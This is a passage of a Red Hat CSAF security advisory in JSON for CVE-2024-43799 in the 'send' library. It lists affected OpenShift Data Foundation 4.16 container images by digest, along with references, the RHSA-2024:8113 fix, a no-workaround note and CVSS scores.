"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
